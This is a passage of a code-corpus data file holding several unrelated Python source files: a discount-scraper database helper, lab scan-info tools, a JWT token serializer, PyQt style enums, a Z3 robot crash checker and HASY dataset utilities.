{}\".format((discount_info.get('shop_name'))))\n mall_name.update(discount_info)\n if mall_name.get('_id'):\n del mall_name['_id']\n coll.save(mall_name)\n\n get_discount = coll.find_one({'_id': mall_name['_id']})\n\n if get_discount['discount_image']:\n\n data = {'link': get_discount['discount_image'], 'id': str(get_discount['_id'])}\n\n client = boto3.client(\n 'sns',\n aws_access_key_id=AWS_ACCESS_KEY,\n aws_secret_access_key=AWS_SECRET_KEY,\n region_name='us-east-2'\n )\n\n client.publish(TopicArn=TOPIC_ARN, Message=json.dumps(data))\n else:\n\n print(\"Discount already exists {}\".format(discount_info.get('shop_name')))\n\n # finished_mall_discount = coll.find({'shop_name': discount_info.get('shop_name')})\n\n finished_mall_discount = coll.find({'shop_name': discount_info.get('shop_name')}).next()\n\n return finished_mall_discount\n\n\ndef adding_new_discount_to_db(coll, discount_info, mall_name):\n\n serch_discount = coll.aggregate(\n [\n {\"$unwind\": \"$discount\"},\n {'$match': {\n 'discount.discount_description': discount_info['discount_description'],\n 'discount.date_start': discount_info['date_start'],\n 'discount.date_end': discount_info['date_end']\n }\n }\n ]\n )\n\n try:\n serch_discount.next()\n print(\"Discount already exists {}\".format(discount_info.get('shop_name')))\n\n except StopIteration:\n\n coll.update({'mall_name': mall_name}, {\"$push\": {\"discount\": discount_info}})\n print(\"Adding new discount: {}\".format(discount_info))\n\n finished_mall_discount = coll.find({'mall_name': mall_name}).next()\n\n return finished_mall_discount\n","sub_path":"api_scraper/scrapers_views/db_info_and_adding.py","file_name":"db_info_and_adding.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"142611381","text":"from configparser import ConfigParser\nimport os\nimport re\nimport pandas as pd\nimport glob\nfrom getanalysisdata import analysisdata\n\n\ndef 
df_scaninfo(dir_date, para_txt):\n '''Create a dataframe from all the scan data'''\n\n #get column names for the dataframe\n info_key = config_keys(dir_date)\n if len(info_key)==3: #old MC version\n columns = ['Scan', 'Start Info', 'Scan Parameter','Start','End','Shots']\n elif len(info_key)==8:#new MC from May 2020\n columns = ['Scan', 'Start Info', 'Scan Parameter', 'Start', 'End',\n 'Step', 'Shots/step', 'End Info']\n else:\n columns = info_key\n \n #add experimental parameters to the column names \n if para_txt:\n exp_paras = para_txt.replace(\", \", \",\").split(\",\")\n columns = columns+exp_paras\n\n # fill in data\n data = pd.DataFrame(columns=columns)\n last_scan = get_last_scannumber(dir_date)\n for i in range(last_scan):\n info_row = get_scaninfo_row(dir_date, para_txt, i + 1, len(columns))\n data.loc[i] = info_row\n return data\n\ndef config_keys(dir_date, last_scan=10):\n '''Get keys of a ScanInfo(config) file. Look for each scan until finding non-empty one.\n '''\n keys = None\n for i in range(last_scan):\n keys,values = get_scaninfo(dir_date, i+1)\n if keys:\n break\n return keys\n\ndef get_scaninfo_row(dir_date, para_txt, n_scan, len_col):\n '''Get scan info for a scan (n_scan). Return a text of a row to write on a table.'''\n\n #Get basic scan info from scaninfo file\n keys, values = get_scaninfo(dir_date, n_scan)\n if not keys:\n row_list = [n_scan] + ['-'] * (len(len_col) - 1)\n else:\n #Get data from analysis file\n analysis = analysisdata(dir_date, n_scan)\n \n # Say 'No scan' if scan parameter is 'Shotnumber'. 
\n # Get alias of scan parameter if exists\n if values[2] in 'Shotnumber':\n values[2] = 'No Scan'\n elif analysis.get_par_alias(values[2]):\n values[2] = analysis.get_par_alias(values[2])\n\n for i in range(1,len(values)):\n #replace None with '-'\n if not values[i]:\n values[i] = '-'\n # round up a value to 3 decimal\n elif values[i][0].isdecimal():\n values[i] = str(round(float(values[i][0]), 3))\n \n #in case of old MC version, append additional info\n if len(keys)==3:\n _, n_shot = analysis.get_start_end_val('Shotnumber')\n val_start, val_end = analysis.get_start_end_val(values[2])\n values = values + [val_start, val_end, n_shot]\n\n #get additional experimental parameters\n exp_vals = []\n if para_txt:\n exp_paras = para_txt.replace(\", \", \",\").split(\",\")\n for i in range(len(exp_paras)):\n exp_val = analysis.get_val(exp_paras[i])\n # say 'scan' if this is a scan parameter\n if exp_paras[i] in values[2]:\n exp_val = 'scan'\n exp_vals = exp_vals + [exp_val]\n\n # Make a row of the dataframe\n row_list = values + exp_vals\n\n return row_list\n\n\ndef get_scaninfo(dir_date, n_scan):\n '''Get scan number, scan parameter, scan start info from ScanInfoScan***.ini'''\n scan_3d = '{0:03}'.format(n_scan)\n file_config = dir_date + '\\\\scans\\\\Scan' + scan_3d + '\\\\ScanInfoScan' + scan_3d + '.ini'\n config = ConfigParser()\n config_read = config.read(file_config)\n if config_read:\n keys = list(config['Scan Info'].keys())\n values = [i.strip('\"') for i in config['Scan Info'].values()]\n else:\n keys, values = None, None\n return keys, values\n\n\ndef get_last_scannumber(dir_date):\n '''Get the last scan number which is already done'''\n\n path = dir_date + '\\\\analysis'\n if not os.path.isdir(path):\n return 0\n else:\n # get last scan info file name\n files = glob.glob(path + '\\\\s*info.txt')\n file_last = os.path.basename(files[-1])\n # regexp. 
find number in the file name\n n_scans = int(re.findall(r\"\\d+\", file_last)[0])\n return n_scans\n\n\ndef get_val(dir_date, n_scan, par):\n \"Get the parameter value of the first shot\"\n file = dir_date + '\\\\analysis\\\\s' + str(n_scan) + '.txt'\n data = pd.read_csv(file, sep='\\t')\n indices = [k for k, s in enumerate(list(data)) if par in s]\n if not indices or data.empty:\n return '-'\n else:\n par_full = list(data)[indices[0]]\n return round(data[par_full].iloc[0], 3)\n\ndef get_start_end_val(dir_date, n_scan, par, isalias=True):\n '''Get the value of the first shot and the last shot. Using this only for the old MC version'''\n\n file = dir_date + '\\\\analysis\\\\s' + str(n_scan) + '.txt'\n data = pd.read_csv(file, sep='\\t')\n indices = [k for k, s in enumerate(list(data)) if par in s]\n if not indices or data.empty:\n if par=='Shotnumber':\n return par, 0, 0\n else:\n return '-', '-', '-'\n else:\n par_full = list(data)[indices[0]]\n val_first, val_end = data[par_full].iloc[0], data[par_full].iloc[-1]\n\n # Get Alias if exists\n if isalias:\n if 'Alias' in par_full:\n par_full = par_full.split('Alias:', 1)[1]\n return par_full, round(val_first, 3), round(val_end, 3)","sub_path":"ScanInfoToGsheet/source/getscaninfo.py","file_name":"getscaninfo.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"605340520","text":"from rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\n\nISS_DOMAIN = 'koreromaori.com'\n\nclass MiApiObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n token['iss'] = ISS_DOMAIN\n token['sub'] = user.username\n token['roles'] = list(\n user\n .user_permissions\n .values_list('codename', flat=True)\n )\n return 
token\n","sub_path":"corpora/corpora/serializers/jwt_authentication.py","file_name":"jwt_authentication.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"567635503","text":"\"\"\"Collection of enum classes that make life a little easier.\n\nWhen setting style options, it's useful to have a list of available,\ncorrectly spelled strings, which can then be used by the programmer\nwithout having to go look up the available style options.\n\nThese enums were built based on:\n\nhttp://doc.qt.io/qt-5/stylesheet-reference.html#list-of-properties\n\nExample:\n\n.. code-block:: python\n\n # create a stylesheet\n self.style = WidgetStyleSheet(self)\n # set border style without having to worry about spelling.\n self.style.border_style = BorderStyle().dashed\n\n # set animation curve\n # this sets an animation on the border thickness of the current style\n # which goes from 0 to 10 pixels, as integer, in one second, and repeats\n # infinitely. 
The curve is set to in_quad.\n self.style.border_thickness.add_animation(\n 0, 10, 1, curve=Curve().in_quad, loops=-1)\n\"\"\"\n\n\nfrom PyQt5 import Qt\n\n\nclass TextDecoration():\n \"\"\"TextDecoration.\n\n :ivar none: no text decoration\n :ivar underline: underlined text\n :ivar overline: overlined text\n :ivar line-through: line through text\n \"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.none = \"none\"\n self.underline = \"underline\"\n self.overline = \"overline\"\n self.line_through = \"line-through\"\n\n\nclass Position():\n \"\"\"Position.\n\n :ivar absolute: absolute positioning.\n :ivar relative: relative positioning.\n \"\"\"\n\n def _init__(self):\n \"\"\"Init.\"\"\"\n self.absolute = \"absolute\"\n self.relative = \"relative\"\n\n\nclass BorderStyle():\n \"\"\"BorderStyle.\n\n :ivar dashed: dashed border style.\n :ivar dot-dash: dot, dash style.\n :ivar dot-dot-dash: dot, dot, dash style.\n :ivar dotted: dotted style.\n :ivar double: double border.\n :ivar groove: grooved border.\n :ivar inset: inset border.\n :ivar outset: outset border.\n :ivar ridge: ridged border.\n :ivar solid: solid border.\n :ivar none: no border.\n \"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.dashed = \"dashed\"\n self.dot_dash = \"dot-dash\"\n self.dot_dot_dash = \"dot-dot-dash\"\n self.dotted = \"dotted\"\n self.double = \"double\"\n self.groove = \"groove\"\n self.inset = \"inset\"\n self.outset = \"outset\"\n self.ridge = \"ridge\"\n self.solid = \"solid\"\n self.none = \"none\"\n\n\nclass Alignment():\n \"\"\"enum for various alignments.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.top = \"top\"\n self.bottom = \"bottom\"\n self.left = \"left\"\n self.right = \"right\"\n self.center = \"center\"\n\n\nclass Attachment():\n \"\"\"enum for Attachment property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.scroll = \"scroll\"\n self.fixed = \"fixed\"\n\n\nclass FontStyle():\n \"\"\"enum for Font style property.\"\"\"\n\n def 
__init__(self):\n \"\"\"Init.\"\"\"\n self.normal = \"normal\"\n self.italic = \"italic\"\n self.oblique = \"oblique\"\n\n\nclass Origin():\n \"\"\"enum for Origin property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.margin = \"margin\"\n self.border = \"border\"\n self.padding = \"padding\"\n self.content = \"content\"\n\n\nclass PaletteRole():\n \"\"\"enum for Palette Role property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.alternate_base = \"alternate-base\"\n self.base = \"base\"\n self.bright_text = \"bright-text\"\n self.button = \"button\"\n self.button_text = \"button-text\"\n self.dark = \"dark\"\n self.highlight = \"highlight\"\n self.highlighted_text = \"highlighted-text\"\n self.light = \"light\"\n self.link = \"link\"\n self.link_visited = \"link-visited\"\n self.mid = \"mid\"\n self.midlight = \"midlight\"\n self.shadow = \"shadow\"\n self.text = \"text\"\n self.window = \"window\"\n self.window_text = \"window-text\"\n\n\nclass Repeat():\n \"\"\"enum for the repeat property.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.repeat_x = \"repeat-x\"\n self.repeat_y = \"repeat-y\"\n self.repeat = \"repeat\"\n self.no_repeat = \"no-repeat\"\n\n\nclass Spread():\n \"\"\"enum for gradient spread options.\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.pad = \"pad\"\n self.reflect = \"reflect\"\n self.repeat = \"repeat\"\n\n\nclass Curve():\n \"\"\"enum for easing curves.\n\n Provides a shorthand way of accessing curve types.\n\n Available types are listed on:\n http://pyqt.sourceforge.net/Docs/PyQt4/qeasingcurve.html#Type-enum\n \"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.curve = Qt.QEasingCurve()\n\n self.linear = self.curve.Linear\n\n self.in_quad = self.curve.InQuad\n self.out_quad = self.curve.OutQuad\n self.in_out_quad = self.curve.InOutQuad\n\n self.in_cubic = self.curve.InCubic\n self.out_cubic = self.curve.OutCubic\n self.in_out_cubic = self.curve.InOutCubic\n self.out_in_cubic = 
self.curve.OutInCubic\n\n self.in_quart = self.curve.InQuart\n self.out_quart = self.curve.OutQuart\n self.in_out_quart = self.curve.InOutQuart\n self.out_in_quart = self.curve.OutInQuart\n\n self.in_quint = self.curve.InQuint\n self.out_quint = self.curve.OutQuint\n self.in_out_quint = self.curve.InOutQuint\n self.out_in_quint = self.curve.OutInQuint\n\n self.in_sine = self.curve.InSine\n self.out_sine = self.curve.OutSine\n self.in_out_sine = self.curve.InOutSine\n self.out_in_sine = self.curve.OutInSine\n\n self.in_expo = self.curve.InExpo\n self.out_expo = self.curve.OutExpo\n self.in_out_expo = self.curve.InOutExpo\n self.out_in_expo = self.curve.OutInExpo\n\n self.in_circ = self.curve.InCirc\n self.out_circ = self.curve.OutCirc\n self.in_out_circ = self.curve.InOutCirc\n self.out_in_circ = self.curve.OutInCirc\n\n self.in_elastic = self.curve.InElastic\n self.out_elastic = self.curve.OutElastic\n self.in_out_elastic = self.curve.InOutElastic\n self.out_in_elastic = self.curve.OutInElastic\n\n self.in_back = self.curve.InBack\n self.out_back = self.curve.OutBack\n self.in_out_back = self.curve.InOutBack\n self.out_in_back = self.curve.OutInBack\n\n self.in_bounce = self.curve.InBounce\n self.out_bounce = self.curve.OutBounce\n self.in_out_bounce = self.curve.InOutBounce\n self.out_in_bounce = self.curve.OutInBounce\n","sub_path":"styledpyqt/StyleOptions.py","file_name":"StyleOptions.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"411709299","text":"#This version of the script supresses the printed output to only know the node number, action (as Z3 variable), \n#and crash determination for the bounds of each node\n\n\nfrom abstract_state_utils import State, StateBounds, StateMapper, TreeInformation\nfrom typing import List\nfrom z3 import *\n\nchild_left = [1, 3, 5, 7, 9, 11, 13, -1, -1, -1, -1, -1, -1, -1, -1]\nchild_right = [2, 4, 6, 8, 10, 12, 14, -1, -1, 
-1, -1, -1, -1, -1, -1]\nfeature = [0, 2, 7, 10, 25, 39, 60, -1, -1, -1, -1, -1, -1, -1, -1]\nthreshold = [1.0, 0.5, 3, 0.5, 0.5, 0.5, 0.5, -1, -1, -1, -1, -1, -1, -1, -1]\nvalue = [-1, -1, -1, -1, -1, -1, -1, 0, 2, 3, 1, 5, 4, 0, 2]\n\nupper_bound: State = [3.14, 4.0, 5.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]\n\nlower_bound: State = [-3.14, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n\nroot_bounds: StateBounds = StateBounds(state_bound_low=lower_bound, state_bound_high=upper_bound)\n\ntree_info: TreeInformation = TreeInformation(root_state_bounds=root_bounds, child_left=child_left,\n child_right=child_right, feature=feature, threshold=threshold, value=value)\nsm: StateMapper = StateMapper(tree_info)\n\n# This is a list of statebounds. 
The index of the list corresponds to node number, and the value of this array is the\n# StateBounds for that node\nall_state_bounds: List[StateBounds] = sm.map_abstract_states()\n\n# node = input variable\n\n#print(\"State Bounds For Node 0\")\n#print(all_state_bounds[0])\n#print(\"State Bounds For Node 8\")\n#print(all_state_bounds[8])\n\n# to access the lower or upper bound of node 8, for example do some something like:\n# all_state_bounds[8].sbound_low\n# all_state_bounds[8].sbound_high\n\n\n\n\n## EVERYTHING BELOW THIS IS AUSTIN'S CODE\n\n#Take lower bound and upper bound and run this check on all states within upper and lower bounds. A is action, leaf is node number\ndef test(upper,lower, A, leaf):\n\n all_occupied_1 = []\n all_occupied_2 = []\n\n\n for j in range(3,len(upper)):\n if upper[j] >= 0.5:\n all_occupied_1.append(j)\n \n for j in range(3,len(lower)):\n if lower[j] >= 0.5:\n all_occupied_2.append(j)\n\n# print(\"All occupied cells from Upper\")\n# print(all_occupied_1)\n# print(\"\\n\")\n#\n# print(\"All occupied cells from Lower\")\n# print(all_occupied_2)\n# print(\"\\n\")\n\n\n #build array of the potentially dangerous cells as all true for each action\n danger_forward = [7,17,27,8,18,28]\n danger_for_left = [9,19,29,10,20,30]\n danger_for_right = [5,15,25,6,16,26]\n\n\n #check these elements of input, if they are occupied then store as c_ else store as Not(c_)\n occ_dang_for_right_up = []\n occ_dang_for_up = []\n occ_dang_for_left_up = []\n occ_dang_for_right_low = []\n occ_dang_for_low = []\n occ_dang_for_left_low = []\n\n\n crash_0 = [] # forward right crash\n crash_2 = [] # forward crash\n crash_4 = [] # forward left crash\n\n for i in danger_for_right:\n a = Bools('c%d' % i)\n crash_0.append(a[0])\n\n for i in danger_forward:\n b = Bools('c%d' % i)\n crash_2.append(b[0])\n\n for i in danger_for_left:\n c = Bools('c%d' % i)\n crash_4.append(c[0])\n \n #check these elements of input, if they are occupied then store as c_ else store as Not(c_)\n 
def filler(danger,occ_upper,occ_lower,upper, lower):\n \n for i in danger:\n if upper[i] >= 0.5:\n filled = Bools('c%d' % i)\n occ_upper.append(filled[0])\n else:\n empty = Bools('c%d' % i)\n occ_upper.append(Not(empty[0]))\n \n# print(\"Upper:\")\n# print(occ_upper)\n \n for i in danger:\n if lower[i] >= 0.5:\n filled = Bools('c%d' % i)\n occ_lower.append(filled[0])\n else:\n empty = Bools('c%d' % i)\n occ_lower.append(Not(empty[0]))\n \n# print(\"Lower:\")\n# print(occ_lower)\n \n return occ_upper,occ_lower\n \n\n def prove(f):\n s = Solver() # if I remove I get an interesting result\n s.add(Not(f))\n if str(s.check()) == 'unsat': #determine sat or unsat\n return \"crash\"\n else:\n return \"safe action\"\n\n \n # If both crash, then definitely crash\n # If only one crashes, may crash in a subspace of the node space\n # If both don't crash, then no crash\n def crash_check(occ_upper,occ_lower,crash):\n \n s = Solver()\n \n def bounds_check(occ):\n for i in range(len(crash)):\n s.push()\n crashing = And(occ[i],crash[i]) == Or(And(occ[i],crash[i]), crash[i])\n check = prove(crashing)\n if str(check) == 'crash':\n return print(\"The robot will crash into an object in cell \" + str(occ[i]))\n s.pop()\n \n return print(\"safe action\")\n \n print(\"Upper Bound check...\")\n bounds_check(occ_upper)\n print(\"\\n\")\n print(\"Lower Bound check...\")\n bounds_check(occ_lower)\n\n return s.check()\n\n\n # \"Potentially dangerous occupied\" means cells in immediate range of causing a crash for a specific action, given the described constraints, any cell outside of this range would be far enough that the robot would be able to recalibrate and make a \"safer\" decision\n\n \n if str(A) == 'a0':\n #print(\"Cells that will cause a crash if Action 0\")\n #print(crash_0)\n #print(\"\\n\")\n # print(\"Currently occupied potentially dangerous cells if action = 0 for node \" + str(leaf))\n filler(danger_for_right,occ_dang_for_right_up,occ_dang_for_right_low,upper,lower) #action 0\n 
#print(\"\\n\")\n crash_check(occ_dang_for_right_up,occ_dang_for_right_low, crash_0)\n\n\n elif str(A) == 'a2':\n # print(\"Cells that will cause a crash if Action 2\")\n #print(crash_2)\n #print(\"\\n\")\n #print(\"Currently occupied potentially dangerous cells if action = 2 for node \" + str(leaf))\n filler(danger_forward,occ_dang_for_up,occ_dang_for_low, upper, lower) #action 2\n #print(\"\\n\")\n crash_check(occ_dang_for_up, occ_dang_for_low, crash_2)\n\n \n\n elif str(A) == 'a4':\n # print(\"Cells that will cause a crash if Action 4\")\n #print(crash_4)\n #print(\"\\n\")\n #print(\"Currently occupied potentially dangerous cells if action = 4 for node \" + str(leaf))\n filler(danger_for_right,occ_dang_for_left_up, occ_dang_for_left_low, upper, lower) #action 4\n #print(\"\\n\")\n crash_check(occ_dang_for_left_up,occ_dang_for_left_low, crash_4)\n\n else:\n print(\"safe action\")\n\n\n return\n\n\n\nact = [Int('a%s' % i) for i in range(6)]\n\n#print A #a0, a1, a2, a3, a4, a5, a6\n\n##action a0 = forward and right\n##action a2 = forward\n##action a2 = forward and left\n\n#0 forward right\n#1 rotate right\n#2 forward\n#3 stop\n#4 forward left\n#5 rotate left\n\nnodes = []\n\nfor i in range(len(value)):\n if value[i] != -1:\n nodes.append(i) #get inidices of nodes to be used later in loop to check for crash at each node\n\n# print(nodes)\n\n# Determine which leaf nodes have bounds that will or will not result in a crash\nfor node in nodes:\n print(\"Checking Node \" + str(node) + \"...\\n\")\n print(\"Action from Node \" + str(node) + \":\")\n print(act[value[node]])\n print(\"\\n\")\n# A.append(act[value[leaf]]) #don't do this until I am running final function\n# print(\"Upper Bound of Node \" + str(node) + \"...\\n\")\n# print(all_state_bounds[node].sbound_high)\n# print(\"\\n\")\n# print(\"Lower Bound of Node \" + str(node) + \"...\\n\")\n# print(all_state_bounds[node].sbound_low)\n# print(\"\\n\")\n test(all_state_bounds[node].sbound_high, 
all_state_bounds[node].sbound_low, act[value[node]], node)\n print(\"\\n \\n \\n \\n \\n \\n\")\n","sub_path":"Crash_Check_Supressed.py","file_name":"Crash_Check_Supressed.py","file_ext":"py","file_size_in_byte":8623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299595775","text":"import json\nimport os\nimport pkgutil\nfrom .io import load_file\nfrom datasmart.core import global_config\n\n\ndef load_config(module_name: tuple, filename='config.json', load_json=True):\n \"\"\" load the config file for this module.\n\n It will perform the following steps:\n\n 1. get the config file ``config/{os.sep.join(module_name)}/config.json``, where ``/`` is ``\\`` for Windows,\n under the directory consisting the invoked Python script.\n 2. if the above step fails, load the default one provided by the module.\n\n\n :param filename: which file to load. by default, ``config.json``.\n :param module_name: module name as a list of strings, \"AA.BB\" is represented as ``[\"AA\",\"BB\"]``\n :param load_json: whether parse the string as JSON or not.\n :return: the JSON object of the module config file, or the raw string.\n \"\"\"\n path_list = (global_config['project_root'], 'config') + module_name + (filename,)\n config_path = os.path.join(*path_list)\n path_list_global = (os.path.expanduser('~'), '.datasmart', 'config') + module_name + (filename,)\n config_path_global = os.path.join(*path_list_global)\n a = os.path.exists(config_path)\n b = os.path.exists(config_path_global)\n if a or b:\n if a:\n # step 1. load config in current project.\n file_to_use = config_path\n else:\n # step 2. load config in ~/.datasmart\n file_to_use = config_path_global\n\n config = load_file(file_to_use, load_json=False)\n else:\n # step 3. load default config\n config = pkgutil.get_data(\n global_config['root_package_spec'] + '.config.' 
+ '.'.join(module_name), filename).decode()\n if load_json:\n config = json.loads(config)\n return config\n","sub_path":"datasmart/core/util/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167613577","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nTools for the HASY dataset.\n\nType `./hasy_tools.py --help` for the command line tools and `help(hasy_tools)`\nin the interactive Python shell for the module options of hasy_tools.\n\nSee https://arxiv.org/abs/1701.08380 for details about the dataset.\n\"\"\"\n\nimport logging\nimport csv\nimport json\nimport os\nimport random\nrandom.seed(0) # make sure results are reproducible\nfrom PIL import Image, ImageDraw\nimport sys\nfrom six.moves import urllib\nimport hashlib\nfrom sklearn.model_selection import train_test_split\n\nimport numpy as np\nnp.random.seed(0) # make sure results are reproducible\nimport scipy.ndimage\nimport matplotlib.pyplot as plt\ntry:\n from urllib.request import urlretrieve # Python 3\nexcept ImportError:\n from urllib import urlretrieve # Python 2\nfrom six.moves.urllib.error import URLError\nfrom six.moves.urllib.error import HTTPError\nimport tarfile\nimport shutil\nfrom six.moves import cPickle as pickle\n\nlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\n\n__version__ = \"v2.4\"\n\nn_classes = 369\nlabels = []\nWIDTH = 32\nHEIGHT = 32\nimg_rows = 32\nimg_cols = 32\nimg_channels = 1\nsymbol_id2index = None\n\n\ndef _load_csv(filepath, delimiter=',', quotechar=\"'\"):\n \"\"\"\n Load a CSV file.\n\n Parameters\n ----------\n filepath : str\n Path to a CSV file\n delimiter : str, optional\n quotechar : str, optional\n\n Returns\n -------\n list of dicts : Each line of the CSV file is one element of the list.\n \"\"\"\n data = []\n csv_dir = os.path.dirname(filepath)\n with 
open(filepath, 'r') as csvfile:\n reader = csv.DictReader(csvfile,\n delimiter=delimiter,\n quotechar=quotechar)\n for row in reader:\n for el in ['path', 'path1', 'path2']:\n if el in row:\n row[el] = os.path.abspath(os.path.join(csv_dir, row[el]))\n data.append(row)\n return data\n\n\ndef generate_index(csv_filepath):\n \"\"\"\n Generate an index 0...k for the k labels.\n\n Parameters\n ----------\n csv_filepath : str\n Path to 'test.csv' or 'train.csv'\n\n Returns\n -------\n tuple of dict and a list\n dict : Maps a symbol_id as in test.csv and\n train.csv to an integer in 0...k, where k is the total\n number of unique labels.\n list : LaTeX labels\n \"\"\"\n symbol_id2index = {}\n data = _load_csv(csv_filepath)\n i = 0\n labels = []\n for item in data:\n if item['symbol_id'] not in symbol_id2index:\n symbol_id2index[item['symbol_id']] = i\n labels.append(item['latex'])\n i += 1\n return symbol_id2index, labels\n\n\ndef _validate_file(fpath, md5_hash):\n \"\"\"\n Validate a file against a MD5 hash.\n\n Parameters\n ----------\n fpath: string\n Path to the file being validated\n md5_hash: string\n The MD5 hash being validated against\n\n Returns\n ---------\n bool\n True, if the file is valid. 
Otherwise False.\n \"\"\"\n hasher = hashlib.md5()\n with open(fpath, 'rb') as f:\n buf = f.read()\n hasher.update(buf)\n if str(hasher.hexdigest()) == str(md5_hash):\n return True\n else:\n return False\n\n\ndef _get_file(fname, origin, md5_hash=None, cache_subdir='~/.datasets'):\n \"\"\"\n Download a file from a URL if it not already in the cache.\n\n Passing the MD5 hash will verify the file after download\n as well as if it is already present in the cache.\n\n Parameters\n ----------\n fname: name of the file\n origin: original URL of the file\n md5_hash: MD5 hash of the file for verification\n cache_subdir: directory being used as the cache\n\n Returns\n -------\n Path to the downloaded file\n \"\"\"\n datadir_base = os.path.expanduser(\"~/.datasets\")\n if not os.path.exists(datadir_base):\n os.makedirs(datadir_base)\n if not os.access(datadir_base, os.W_OK):\n logging.warning(\"Could not access {}.\".format(cache_subdir))\n datadir_base = os.path.join('/tmp', '.data')\n datadir = os.path.join(datadir_base, cache_subdir)\n if not os.path.exists(datadir):\n os.makedirs(datadir)\n\n fpath = os.path.join(datadir, fname)\n\n download = False\n if os.path.exists(fpath):\n # File found; verify integrity if a hash was provided.\n if md5_hash is not None:\n if not _validate_file(fpath, md5_hash):\n print('A local file was found, but it seems to be '\n 'incomplete or outdated.')\n download = True\n else:\n download = True\n\n if download:\n print('Downloading data from {} to {}'.format(origin, fpath))\n error_msg = 'URL fetch failure on {}: {} -- {}'\n try:\n try:\n urlretrieve(origin, fpath)\n except URLError as e:\n raise Exception(error_msg.format(origin, e.errno, e.reason))\n except HTTPError as e:\n raise Exception(error_msg.format(origin, e.code, e.msg))\n except (Exception, KeyboardInterrupt) as e:\n if os.path.exists(fpath):\n os.remove(fpath)\n raise\n return fpath\n\n\ndef load_data(mode='fold-1', image_dim_ordering='tf'):\n \"\"\"\n Load HASYv2 dataset.\n\n 
Parameters\n ----------\n mode : string, optional (default: \"complete\")\n - \"complete\" : Returns {'x': x, 'y': y} with all labeled data\n - \"fold-1\": Returns {'x_train': x_train,\n 'y_train': y_train,\n 'x_test': x_test,\n 'y_test': y_test}\n - \"fold-2\", ..., \"fold-10\": See \"fold-1\"\n - \"verification\": Returns {'train': {'x_train': List of loaded images,\n 'y_train': list of labels},\n 'test-v1': {'X1s': List of first images,\n 'X2s': List of second images,\n 'ys': List of labels\n 'True' or 'False'}\n 'test-v2': {'X1s': List of first images,\n 'X2s': List of second images,\n 'ys': List of labels\n 'True' or 'False'}\n 'test-v3': {'X1s': List of first images,\n 'X2s': List of second images,\n 'ys': List of labels\n 'True' or 'False'}}\n image_dim_ordering : 'th' for theano or 'tf' for tensorflow (default: 'tf')\n\n Returns\n -------\n dict\n See \"mode\" parameter for details.\n\n All 'x..' keys contain a uint8 numpy array [index, y, x, depth] (or\n [index, depth, y, x] for image_dim_ordering='t')\n\n All 'y..' 
